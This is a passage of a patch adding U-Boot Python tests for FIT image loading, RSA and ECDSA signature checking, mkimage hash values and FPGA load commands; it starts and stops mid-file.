Almost everything: + - hash algorithms - invalid hash/contents should be detected + - signature algorithms - invalid sig/contents should be detected + - compression + - checking that errors are detected like: + - image overwriting + - missing images + - invalid configurations + - incorrect os/arch/type fields + - empty data + - images too large/small + - invalid FDT (e.g. putting a random binary in instead) + - default configuration selection + - bootm command line parameters should have desired effect + - run code coverage to make sure we are testing all the code + """ + # Set up invariant files + control_dtb = fit_util.make_dtb(ubman, base_fdt, 'u-boot') + kernel = fit_util.make_kernel(ubman, 'test-kernel.bin', 'kernel') + ramdisk = make_ramdisk('test-ramdisk.bin', 'ramdisk') + loadables1 = fit_util.make_kernel(ubman, 'test-loadables1.bin', 'lenrek') + loadables2 = make_ramdisk('test-loadables2.bin', 'ksidmar') + kernel_out = make_fname('kernel-out.bin') + fdt = make_fname('u-boot.dtb') + fdt_out = make_fname('fdt-out.dtb') + ramdisk_out = make_fname('ramdisk-out.bin') + loadables1_out = make_fname('loadables1-out.bin') + loadables2_out = make_fname('loadables2-out.bin') + + # Set up basic parameters with default values + params = { + 'fit_addr' : 0x1000, + + 'kernel' : kernel, + 'kernel_out' : kernel_out, + 'kernel_addr' : 0x40000, + 'kernel_size' : filesize(kernel), + + 'fdt' : fdt, + 'fdt_out' : fdt_out, + 'fdt_addr' : 0x80000, + 'fdt_size' : filesize(control_dtb), + 'fdt_load' : '', + + 'ramdisk' : ramdisk, + 'ramdisk_out' : ramdisk_out, + 'ramdisk_addr' : 0xc0000, + 'ramdisk_size' : filesize(ramdisk), + 'ramdisk_load' : '', + 'ramdisk_config' : '', + + 'loadables1' : loadables1, + 'loadables1_out' : loadables1_out, + 'loadables1_addr' : 0x100000, + 'loadables1_size' : filesize(loadables1), + 'loadables1_load' : '', + + 'loadables2' : loadables2, + 'loadables2_out' : loadables2_out, + 'loadables2_addr' : 0x140000, + 'loadables2_size' : filesize(loadables2), + 'loadables2_load' : '', + + 'loadables_config' : '', + 'compression' : 'none', + } + + # Make a basic FIT and a script to load it + fit = fit_util.make_fit(ubman, mkimage, base_its, params) + params['fit'] = fit + cmd = base_script % params + + # First check that we can load a kernel + # We could perhaps reduce duplication with some loss of readability + ubman.config.dtb = control_dtb + ubman.restart_uboot() + with ubman.log.section('Kernel load'): + output = ubman.run_command_list(cmd.splitlines()) + check_equal(kernel, kernel_out, 'Kernel not loaded') + check_not_equal(control_dtb, fdt_out, + 'FDT loaded but should be ignored') + check_not_equal(ramdisk, ramdisk_out, + 'Ramdisk loaded but should not be') + + # Find out the offset in the FIT where U-Boot has found the FDT + line = find_matching(output, 'Booting using the fdt blob at ') + fit_offset = int(line, 16) - params['fit_addr'] + fdt_magic = struct.pack('>L', 0xd00dfeed) + data = read_file(fit) + + # Now find where it actually is in the FIT (skip the first word) + real_fit_offset = data.find(fdt_magic, 4) + assert fit_offset == real_fit_offset, ( + 'U-Boot loaded FDT from offset %#x, FDT is actually at %#x' % + (fit_offset, real_fit_offset)) + + # Check if bootargs strings substitution works + output = ubman.run_command_list([ + 'env set bootargs \\\"\'my_boot_var=${foo}\'\\\"', + 'env set foo bar', + 'bootm prep', + 'env print bootargs']) + assert 'bootargs="my_boot_var=bar"' in output, "Bootargs strings not substituted" + + # Now a kernel and an FDT + with ubman.log.section('Kernel + FDT load'): + params['fdt_load'] = 'load = <%#x>;' % params['fdt_addr'] + fit = fit_util.make_fit(ubman, mkimage, base_its, params) + ubman.restart_uboot() + output = ubman.run_command_list(cmd.splitlines()) + check_equal(kernel, kernel_out, 'Kernel not loaded') + check_equal(control_dtb, fdt_out, 'FDT not loaded') + check_not_equal(ramdisk, ramdisk_out, + 'Ramdisk loaded but should not be') + + # Try a ramdisk + with ubman.log.section('Kernel + FDT + Ramdisk load'): + params['ramdisk_config'] = 'ramdisk = "ramdisk-1";' + params['ramdisk_load'] = 'load = <%#x>;' % params['ramdisk_addr'] + fit = fit_util.make_fit(ubman, mkimage, base_its, params) + ubman.restart_uboot() + output = ubman.run_command_list(cmd.splitlines()) + check_equal(ramdisk, ramdisk_out, 'Ramdisk not loaded') + + # Configuration with some Loadables + with ubman.log.section('Kernel + FDT + Ramdisk load + Loadables'): + params['loadables_config'] = 'loadables = "kernel-2", "ramdisk-2";' + params['loadables1_load'] = ('load = <%#x>;' % + params['loadables1_addr']) + params['loadables2_load'] = ('load = <%#x>;' % + params['loadables2_addr']) + fit = fit_util.make_fit(ubman, mkimage, base_its, params) + ubman.restart_uboot() + output = ubman.run_command_list(cmd.splitlines()) + check_equal(loadables1, loadables1_out, + 'Loadables1 (kernel) not loaded') + check_equal(loadables2, loadables2_out, + 'Loadables2 (ramdisk) not loaded') + + # Kernel, FDT and Ramdisk all compressed + with ubman.log.section('(Kernel + FDT + Ramdisk) compressed'): + params['compression'] = 'gzip' + params['kernel'] = make_compressed(kernel) + params['fdt'] = make_compressed(fdt) + params['ramdisk'] = make_compressed(ramdisk) + fit = fit_util.make_fit(ubman, mkimage, base_its, params) + ubman.restart_uboot() + output = ubman.run_command_list(cmd.splitlines()) + check_equal(kernel, kernel_out, 'Kernel not loaded') + check_equal(control_dtb, fdt_out, 'FDT not loaded') + check_not_equal(ramdisk, ramdisk_out, 'Ramdisk got decompressed?') + check_equal(ramdisk + '.gz', ramdisk_out, 'Ramdist not loaded') + + + # We need to use our own device tree file. Remember to restore it + # afterwards. + old_dtb = ubman.config.dtb + try: + mkimage = ubman.config.build_dir + '/tools/mkimage' + run_fit_test(mkimage) + finally: + # Go back to the original U-Boot with the correct dtb. + ubman.config.dtb = old_dtb + ubman.restart_uboot() diff --git a/test/py/tests/test_fit_auto_signed.py b/test/py/tests/test_fit_auto_signed.py new file mode 100644 index 00000000000..cdfd341c6f5 --- /dev/null +++ b/test/py/tests/test_fit_auto_signed.py @@ -0,0 +1,194 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2022 Massimo Pegorer + +""" +Test that mkimage generates auto-FIT with signatures and/or hashes as expected. + +The mkimage tool can create auto generated (i.e. without an ITS file +provided as input) FIT in three different flavours: with crc32 checksums +of 'images' subnodes; with signatures of 'images' subnodes; with sha1 +hashes of 'images' subnodes and signatures of 'configurations' subnodes. +This test verifies that auto-FIT are generated as expected, in all of +the three flavours, including check of hashes and signatures (except for +configurations ones). + +The test does not run the sandbox. It only checks the host tool mkimage. +""" + +import os +import pytest +import utils +import binascii +from Cryptodome.Hash import SHA1 +from Cryptodome.Hash import SHA256 +from Cryptodome.PublicKey import RSA +from Cryptodome.Signature import pkcs1_15 + +class SignedFitHelper(object): + """Helper to manipulate a FIT with signed/hashed images/configs.""" + def __init__(self, ubman, file_name): + self.fit = file_name + self.ubman = ubman + self.images_nodes = set() + self.confgs_nodes = set() + + def __fdt_list(self, path): + return utils.run_and_log(self.ubman, + f'fdtget -l {self.fit} {path}') + + def __fdt_get_string(self, node, prop): + return utils.run_and_log(self.ubman, + f'fdtget -ts {self.fit} {node} {prop}') + + def __fdt_get_binary(self, node, prop): + numbers = utils.run_and_log(self.ubman, + f'fdtget -tbi {self.fit} {node} {prop}') + + bignum = bytearray() + for little_num in numbers.split(): + bignum.append(int(little_num)) + + return bignum + + def build_nodes_sets(self): + """Fill sets with FIT images and configurations subnodes.""" + for node in self.__fdt_list('/images').split(): + subnode = f'/images/{node}' + self.images_nodes.add(subnode) + + for node in self.__fdt_list('/configurations').split(): + subnode = f'/configurations/{node}' + self.confgs_nodes.add(subnode) + + return len(self.images_nodes) + len(self.confgs_nodes) + + def check_fit_crc32_images(self): + """Test that all images in the set are hashed as expected. + + Each image must have an hash with algo=crc32 and hash value must match + the one calculated over image data. + """ + for node in self.images_nodes: + algo = self.__fdt_get_string(f'{node}/hash', 'algo') + assert algo == "crc32\n", "Missing expected crc32 image hash!" + + raw_crc32 = self.__fdt_get_binary(f'{node}/hash', 'value') + raw_bin = self.__fdt_get_binary(node, 'data') + assert raw_crc32 == (binascii.crc32(raw_bin) & + 0xffffffff).to_bytes(4, 'big'), "Wrong crc32 hash!" + + def check_fit_signed_images(self, key_name, sign_algo, verifier): + """Test that all images in the set are signed as expected. + + Each image must have a signature with: key-name-hint matching key_name + argument; algo matching sign_algo argument; value matching the one + calculated over image data using verifier argument. + """ + for node in self.images_nodes: + hint = self.__fdt_get_string(f'{node}/signature', 'key-name-hint') + assert hint == key_name + "\n", "Missing expected key name hint!" + algo = self.__fdt_get_string(f'{node}/signature', 'algo') + assert algo == sign_algo + "\n", "Missing expected signature algo!" + + raw_sig = self.__fdt_get_binary(f'{node}/signature', 'value') + raw_bin = self.__fdt_get_binary(node, 'data') + verifier.verify(SHA256.new(raw_bin), bytes(raw_sig)) + + def check_fit_signed_confgs(self, key_name, sign_algo): + """Test that all configs are signed, and images hashed, as expected. + + Each image must have an hash with algo=sha1 and hash value must match + the one calculated over image data. Each configuration must have a + signature with key-name-hint matching key_name argument and algo + matching sign_algo argument. + TODO: configurations signature checking. + """ + for node in self.images_nodes: + algo = self.__fdt_get_string(f'{node}/hash', 'algo') + assert algo == "sha1\n", "Missing expected sha1 image hash!" + + raw_hash = self.__fdt_get_binary(f'{node}/hash', 'value') + raw_bin = self.__fdt_get_binary(node, 'data') + assert raw_hash == SHA1.new(raw_bin).digest(), "Wrong sha1 hash!" + + for node in self.confgs_nodes: + hint = self.__fdt_get_string(f'{node}/signature', 'key-name-hint') + assert hint == key_name + "\n", "Missing expected key name hint!" + algo = self.__fdt_get_string(f'{node}/signature', 'algo') + assert algo == sign_algo + "\n", "Missing expected signature algo!" + + +@pytest.mark.buildconfigspec('fit_signature') +@pytest.mark.requiredtool('fdtget') +def test_fit_auto_signed(ubman): + """Test that mkimage generates auto-FIT with signatures/hashes as expected. + + The mkimage tool can create auto generated (i.e. without an ITS file + provided as input) FIT in three different flavours: with crc32 checksums + of 'images' subnodes; with signatures of 'images' subnodes; with sha1 + hashes of 'images' subnodes and signatures of 'configurations' subnodes. + This test verifies that auto-FIT are generated as expected, in all of + the three flavours, including check of hashes and signatures (except for + configurations ones). + + The test does not run the sandbox. It only checks the host tool mkimage. + """ + mkimage = ubman.config.build_dir + '/tools/mkimage' + tempdir = os.path.join(ubman.config.result_dir, 'auto_fit') + os.makedirs(tempdir, exist_ok=True) + kernel_file = f'{tempdir}/vmlinuz' + dt1_file = f'{tempdir}/dt-1.dtb' + dt2_file = f'{tempdir}/dt-2.dtb' + key_name = 'sign-key' + sign_algo = 'sha256,rsa4096' + key_file = f'{tempdir}/{key_name}.key' + fit_file = f'{tempdir}/test.fit' + + # Create a fake kernel image and two dtb files with random data + with open(kernel_file, 'wb') as fd: + fd.write(os.urandom(512)) + + with open(dt1_file, 'wb') as fd: + fd.write(os.urandom(256)) + + with open(dt2_file, 'wb') as fd: + fd.write(os.urandom(256)) + + # Create 4096 RSA key and write to file to be read by mkimage + key = RSA.generate(bits=4096) + verifier = pkcs1_15.new(key) + + with open(key_file, 'w') as fd: + fd.write(str(key.export_key(format='PEM').decode('ascii'))) + + b_args = " -d" + kernel_file + " -b" + dt1_file + " -b" + dt2_file + s_args = " -k" + tempdir + " -g" + key_name + " -o" + sign_algo + + # 1 - Create auto FIT with images crc32 checksum, and verify it + utils.run_and_log(ubman, mkimage + ' -fauto' + b_args + " " + fit_file) + + fit = SignedFitHelper(ubman, fit_file) + if fit.build_nodes_sets() == 0: + raise ValueError('FIT-1 has no "/image" nor "/configuration" nodes') + + fit.check_fit_crc32_images() + + # 2 - Create auto FIT with signed images, and verify it + utils.run_and_log(ubman, mkimage + ' -fauto' + b_args + s_args + " " + + fit_file) + + fit = SignedFitHelper(ubman, fit_file) + if fit.build_nodes_sets() == 0: + raise ValueError('FIT-2 has no "/image" nor "/configuration" nodes') + + fit.check_fit_signed_images(key_name, sign_algo, verifier) + + # 3 - Create auto FIT with signed configs and hashed images, and verify it + utils.run_and_log(ubman, mkimage + ' -fauto-conf' + b_args + s_args + " " + + fit_file) + + fit = SignedFitHelper(ubman, fit_file) + if fit.build_nodes_sets() == 0: + raise ValueError('FIT-3 has no "/image" nor "/configuration" nodes') + + fit.check_fit_signed_confgs(key_name, sign_algo) diff --git a/test/py/tests/test_fit_ecdsa.py b/test/py/tests/test_fit_ecdsa.py new file mode 100644 index 00000000000..3e816d68eb6 --- /dev/null +++ b/test/py/tests/test_fit_ecdsa.py @@ -0,0 +1,114 @@ +# SPDX-License-Identifier: GPL-2.0+ +# +# Copyright (c) 2020,2021 Alexandru Gagniuc <mr.nuke.me@gmail.com> + +""" +Test ECDSA signing of FIT images + +This test uses mkimage to sign an existing FIT image with an ECDSA key. The +signature is then extracted, and verified against pyCryptodome. +This test doesn't run the sandbox. It only checks the host tool 'mkimage' +""" + +import os +import pytest +import utils +from Cryptodome.Hash import SHA256 +from Cryptodome.PublicKey import ECC +from Cryptodome.Signature import DSS + +class SignableFitImage(object): + """ Helper to manipulate a FIT image on disk """ + def __init__(self, ubman, file_name): + self.fit = file_name + self.ubman = ubman + self.signable_nodes = set() + + def __fdt_list(self, path): + return utils.run_and_log(self.ubman, f'fdtget -l {self.fit} {path}') + + def __fdt_set(self, node, **prop_value): + for prop, value in prop_value.items(): + utils.run_and_log(self.ubman, + f'fdtput -ts {self.fit} {node} {prop} {value}') + + def __fdt_get_binary(self, node, prop): + numbers = utils.run_and_log(self.ubman, + f'fdtget -tbi {self.fit} {node} {prop}') + + bignum = bytearray() + for little_num in numbers.split(): + bignum.append(int(little_num)) + + return bignum + + def find_signable_image_nodes(self): + for node in self.__fdt_list('/images').split(): + image = f'/images/{node}' + if 'signature' in self.__fdt_list(image): + self.signable_nodes.add(image) + + return self.signable_nodes + + def change_signature_algo_to_ecdsa(self): + for image in self.signable_nodes: + self.__fdt_set(f'{image}/signature', algo='sha256,ecdsa256') + + def sign(self, mkimage, key_file): + utils.run_and_log(self.ubman, [mkimage, '-F', self.fit, f'-G{key_file}']) + + def check_signatures(self, key): + for image in self.signable_nodes: + raw_sig = self.__fdt_get_binary(f'{image}/signature', 'value') + raw_bin = self.__fdt_get_binary(image, 'data') + + sha = SHA256.new(raw_bin) + verifier = DSS.new(key, 'fips-186-3') + verifier.verify(sha, bytes(raw_sig)) + + +@pytest.mark.buildconfigspec('fit_signature') +@pytest.mark.requiredtool('dtc') +@pytest.mark.requiredtool('fdtget') +@pytest.mark.requiredtool('fdtput') +def test_fit_ecdsa(ubman): + """ Test that signatures generated by mkimage are legible. """ + def generate_ecdsa_key(): + return ECC.generate(curve='prime256v1') + + def assemble_fit_image(dest_fit, its, destdir): + dtc_args = f'-I dts -O dtb -i {destdir}' + utils.run_and_log(ubman, [mkimage, '-D', dtc_args, '-f', its, dest_fit]) + + def dtc(dts): + dtb = dts.replace('.dts', '.dtb') + utils.run_and_log(ubman, f'dtc {datadir}/{dts} -O dtb -o {tempdir}/{dtb}') + + mkimage = ubman.config.build_dir + '/tools/mkimage' + datadir = ubman.config.source_dir + '/test/py/tests/vboot/' + tempdir = os.path.join(ubman.config.result_dir, 'ecdsa') + os.makedirs(tempdir, exist_ok=True) + key_file = f'{tempdir}/ecdsa-test-key.pem' + fit_file = f'{tempdir}/test.fit' + dtc('sandbox-kernel.dts') + + key = generate_ecdsa_key() + + # Create a fake kernel image -- zeroes will do just fine + with open(f'{tempdir}/test-kernel.bin', 'w') as fd: + fd.write(500 * chr(0)) + + # invocations of mkimage expect to read the key from disk + with open(key_file, 'w') as f: + f.write(key.export_key(format='PEM')) + + assemble_fit_image(fit_file, f'{datadir}/sign-images-sha256.its', tempdir) + + fit = SignableFitImage(ubman, fit_file) + nodes = fit.find_signable_image_nodes() + if len(nodes) == 0: + raise ValueError('FIT image has no "/image" nodes with "signature"') + + fit.change_signature_algo_to_ecdsa() + fit.sign(mkimage, key_file) + fit.check_signatures(key) diff --git a/test/py/tests/test_fit_hashes.py b/test/py/tests/test_fit_hashes.py new file mode 100644 index 00000000000..07bf0fd5211 --- /dev/null +++ b/test/py/tests/test_fit_hashes.py @@ -0,0 +1,115 @@ +# SPDX-License-Identifier: GPL-2.0+ +# +# Copyright (c) 2021 Alexandru Gagniuc <mr.nuke.me@gmail.com> + +""" +Check hashes produced by mkimage against known values + +This test checks the correctness of mkimage's hashes. by comparing the mkimage +output of a fixed data block with known good hashes. +This test doesn't run the sandbox. It only checks the host tool 'mkimage' +""" + +import os +import pytest +import utils + +kernel_hashes = { + "sha512" : "f18c1486a2c29f56360301576cdfce4dfd8e8e932d0ed8e239a1f314b8ae1d77b2a58cd7fe32e4075e69448e623ce53b0b6aa6ce5626d2c189a5beae29a68d93", + "sha384" : "16e28976740048485d08d793d8bf043ebc7826baf2bc15feac72825ad67530ceb3d09e0deb6932c62a5a0e9f3936baf4", + "sha256" : "2955c56bc1e5050c111ba6e089e0f5342bb47dedf77d87e3f429095feb98a7e5", + "sha1" : "652383e1a6d946953e1f65092c9435f6452c2ab7", + "md5" : "4879e5086e4c76128e525b5fe2af55f1", + "crc32" : "32eddfdf", + "crc16-ccitt" : "d4be" +} + +class ReadonlyFitImage(object): + """ Helper to manipulate a FIT image on disk """ + def __init__(self, ubman, file_name): + self.fit = file_name + self.ubman = ubman + self.hashable_nodes = set() + + def __fdt_list(self, path): + return utils.run_and_log(self.ubman, f'fdtget -l {self.fit} {path}') + + def __fdt_get(self, node, prop): + val = utils.run_and_log(self.ubman, f'fdtget {self.fit} {node} {prop}') + return val.rstrip('\n') + + def __fdt_get_sexadecimal(self, node, prop): + numbers = utils.run_and_log(self.ubman, + f'fdtget -tbx {self.fit} {node} {prop}') + + sexadecimal = '' + for num in numbers.rstrip('\n').split(' '): + sexadecimal += num.zfill(2) + return sexadecimal + + def find_hashable_image_nodes(self): + for node in self.__fdt_list('/images').split(): + # We only have known hashes for the kernel node + if 'kernel' not in node: + continue + self.hashable_nodes.add(f'/images/{node}') + + return self.hashable_nodes + + def verify_hashes(self): + for image in self.hashable_nodes: + algos = set() + for node in self.__fdt_list(image).split(): + if "hash-" not in node: + continue + + raw_hash = self.__fdt_get_sexadecimal(f'{image}/{node}', 'value') + algo = self.__fdt_get(f'{image}/{node}', 'algo') + algos.add(algo) + + good_hash = kernel_hashes[algo] + if good_hash != raw_hash: + raise ValueError(f'{image} Borked hash: {algo}'); + + # Did we test all the hashes we set out to test? + missing_algos = kernel_hashes.keys() - algos + if (missing_algos): + raise ValueError(f'Missing hashes from FIT: {missing_algos}') + + +@pytest.mark.buildconfigspec('hash') +@pytest.mark.requiredtool('dtc') +@pytest.mark.requiredtool('fdtget') +@pytest.mark.requiredtool('fdtput') +def test_mkimage_hashes(ubman): + """ Test that hashes generated by mkimage are correct. """ + + def assemble_fit_image(dest_fit, its, destdir): + dtc_args = f'-I dts -O dtb -i {destdir}' + utils.run_and_log(ubman, [mkimage, '-D', dtc_args, '-f', its, dest_fit]) + + def dtc(dts): + dtb = dts.replace('.dts', '.dtb') + utils.run_and_log(ubman, + f'dtc {datadir}/{dts} -O dtb -o {tempdir}/{dtb}') + + mkimage = ubman.config.build_dir + '/tools/mkimage' + datadir = ubman.config.source_dir + '/test/py/tests/vboot/' + tempdir = os.path.join(ubman.config.result_dir, 'hashes') + os.makedirs(tempdir, exist_ok=True) + + fit_file = f'{tempdir}/test.fit' + dtc('sandbox-kernel.dts') + + # Create a fake kernel image -- Avoid zeroes or crc16 will be zero + with open(f'{tempdir}/test-kernel.bin', 'w') as fd: + fd.write(500 * chr(0xa5)) + + assemble_fit_image(fit_file, f'{datadir}/hash-images.its', tempdir) + + fit = ReadonlyFitImage(ubman, fit_file) + nodes = fit.find_hashable_image_nodes() + if len(nodes) == 0: + raise ValueError('FIT image has no "/image" nodes with "hash-..."') + + fit.verify_hashes() diff --git a/test/py/tests/test_fpga.py b/test/py/tests/test_fpga.py new file mode 100644 index 00000000000..74cd42b910e --- /dev/null +++ b/test/py/tests/test_fpga.py @@ -0,0 +1,565 @@ +# SPDX-License-Identifier: GPL-2.0 +# +# Copyright (c) 2018, Xilinx Inc. +# +# Michal Simek +# Siva Durga Prasad Paladugu + +import pytest +import re +import random +import utils + +""" +Note: This test relies on boardenv_* containing configuration values to define +the network available and files to be used for testing. Without this, this test +will be automatically skipped. + +For example: + +# True if a DHCP server is attached to the network, and should be tested. +env__net_dhcp_server = True + +# A list of environment variables that should be set in order to configure a +# static IP. In this test case we atleast need serverip for performing tftpb +# to get required files. +env__net_static_env_vars = [ + ('ipaddr', '10.0.0.100'), + ('netmask', '255.255.255.0'), + ('serverip', '10.0.0.1'), +] + +# Details regarding the files that may be read from a TFTP server. . +env__fpga_secure_readable_file = { + 'fn': 'auth_bhdr_ppk1_bit.bin', + 'enckupfn': 'auth_bhdr_enc_kup_load_bit.bin', + 'addr': 0x1000000, + 'keyaddr': 0x100000, + 'keyfn': 'key.txt', +} + +env__fpga_under_test = { + 'dev': 0, + 'addr' : 0x1000000, + 'bitstream_load': 'compress.bin', + 'bitstream_load_size': 1831960, + 'bitstream_loadp': 'compress_pr.bin', + 'bitstream_loadp_size': 423352, + 'bitstream_loadb': 'compress.bit', + 'bitstream_loadb_size': 1832086, + 'bitstream_loadbp': 'compress_pr.bit', + 'bitstream_loadbp_size': 423491, + 'mkimage_legacy': 'download.ub', + 'mkimage_legacy_size': 13321468, + 'mkimage_legacy_gz': 'download.gz.ub', + 'mkimage_legacy_gz_size': 53632, + 'mkimage_fit': 'download-fit.ub', + 'mkimage_fit_size': 13322784, + 'loadfs': 'mmc 0 compress.bin', + 'loadfs_size': 1831960, + 'loadfs_block_size': 0x10000, +} +""" + +import test_net + +def check_dev(ubman): + f = ubman.config.env.get('env__fpga_under_test', None) + if not f: + pytest.skip('No FPGA to test') + + dev = f.get('dev', -1) + if dev < 0: + pytest.fail('No dev specified via env__fpga_under_test') + + return dev, f + +def load_file_from_var(ubman, name): + dev, f = check_dev(ubman) + + addr = f.get('addr', -1) + if addr < 0: + pytest.fail('No address specified via env__fpga_under_test') + + test_net.test_net_dhcp(ubman) + test_net.test_net_setup_static(ubman) + bit = f['%s' % (name)] + bit_size = f['%s_size' % (name)] + + expected_tftp = 'Bytes transferred = %d' % bit_size + output = ubman.run_command('tftpboot %x %s' % (addr, bit)) + assert expected_tftp in output + + return f, dev, addr, bit, bit_size + +###### FPGA FAIL test ###### +expected_usage = 'fpga - loadable FPGA image support' + +@pytest.mark.xfail +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_fail(ubman): + # Test non valid fpga subcommand + expected = 'fpga: non existing command' + output = ubman.run_command('fpga broken 0') + #assert expected in output + assert expected_usage in output + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_help(ubman): + # Just show help + output = ubman.run_command('fpga') + assert expected_usage in output + + +###### FPGA DUMP tests ###### + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_dump(ubman): + pytest.skip('Not implemented now') + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_dump_variable(ubman): + # Same as above but via "fpga" variable + pytest.skip('Not implemented now') + +###### FPGA INFO tests ###### + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_info_fail(ubman): + # Maybe this can be skipped completely + dev, f = check_dev(ubman) + + # Multiple parameters to fpga info should fail + expected = 'fpga: more parameters passed' + output = ubman.run_command('fpga info 0 0') + #assert expected in output + assert expected_usage in output + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_info_list(ubman): + # Maybe this can be skipped completely + dev, f = check_dev(ubman) + + # Code is design in a way that if fpga dev is not passed it should + # return list of all fpga devices in the system + ubman.run_command('setenv fpga') + output = ubman.run_command('fpga info') + assert expected_usage not in output + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_info(ubman): + dev, f = check_dev(ubman) + + output = ubman.run_command('fpga info %x' % (dev)) + assert expected_usage not in output + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_info_variable(ubman): + dev, f = check_dev(ubman) + + # + # fpga variable is storing device number which doesn't need to be passed + # + ubman.run_command('setenv fpga %x' % (dev)) + + output = ubman.run_command('fpga info') + # Variable cleanup + ubman.run_command('setenv fpga') + assert expected_usage not in output + +###### FPGA LOAD tests ###### + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_load_fail(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'bitstream_load') + + for cmd in ['dump', 'load', 'loadb']: + # missing dev parameter + expected = 'fpga: incorrect parameters passed' + output = ubman.run_command('fpga %s %x $filesize' % (cmd, addr)) + #assert expected in output + assert expected_usage in output + + # more parameters - 0 at the end + expected = 'fpga: more parameters passed' + output = ubman.run_command('fpga %s %x %x $filesize 0' % (cmd, dev, addr)) + #assert expected in output + assert expected_usage in output + + # 0 address + expected = 'fpga: zero fpga_data address' + output = ubman.run_command('fpga %s %x 0 $filesize' % (cmd, dev)) + #assert expected in output + assert expected_usage in output + + # 0 filesize + expected = 'fpga: zero size' + output = ubman.run_command('fpga %s %x %x 0' % (cmd, dev, addr)) + #assert expected in output + assert expected_usage in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_load(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'bitstream_load') + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga load %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadp') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadp(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'bitstream_load') + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga load %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + + # And load also partial bistream + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'bitstream_loadp') + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadp %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadb(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'bitstream_loadb') + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadb %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadbp') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadbp(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'bitstream_loadb') + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadb %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + + # And load also partial bistream in bit format + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'bitstream_loadbp') + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadbp %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +###### FPGA LOADMK tests ###### + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('legacy_image_format') +def test_fpga_loadmk_fail(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_legacy') + + ubman.run_command('imi %x' % (addr)) + + # load image but pass incorrect address to show error message + expected = 'Unknown image type' + output = ubman.run_command('fpga loadmk %x %x' % (dev, addr + 0x10)) + assert expected in output + + # Pass more parameters then command expects - 0 at the end + output = ubman.run_command('fpga loadmk %x %x 0' % (dev, addr)) + #assert expected in output + assert expected_usage in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('legacy_image_format') +def test_fpga_loadmk_legacy(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_legacy') + + ubman.run_command('imi %x' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadmk %x %x && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.xfail +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('legacy_image_format') +def test_fpga_loadmk_legacy_variable_fpga(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_legacy') + + ubman.run_command('imi %x' % (addr)) + + ubman.run_command('setenv fpga %x' % (dev)) + + # this testcase should cover case which looks like it is supported but dev pointer is broken by loading mkimage address + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadmk %x && echo %s' % (addr, expected_text)) + ubman.run_command('setenv fpga') + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('legacy_image_format') +def test_fpga_loadmk_legacy_variable_fpgadata(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'mkimage_legacy') + + ubman.run_command('imi %x' % (addr)) + + ubman.run_command('setenv fpgadata %x' % (addr)) + + # this testcase should cover case which looks like it is supported but dev pointer is broken by loading mkimage address + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadmk %x && echo %s' % (dev, expected_text)) + ubman.run_command('setenv fpgadata') + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') 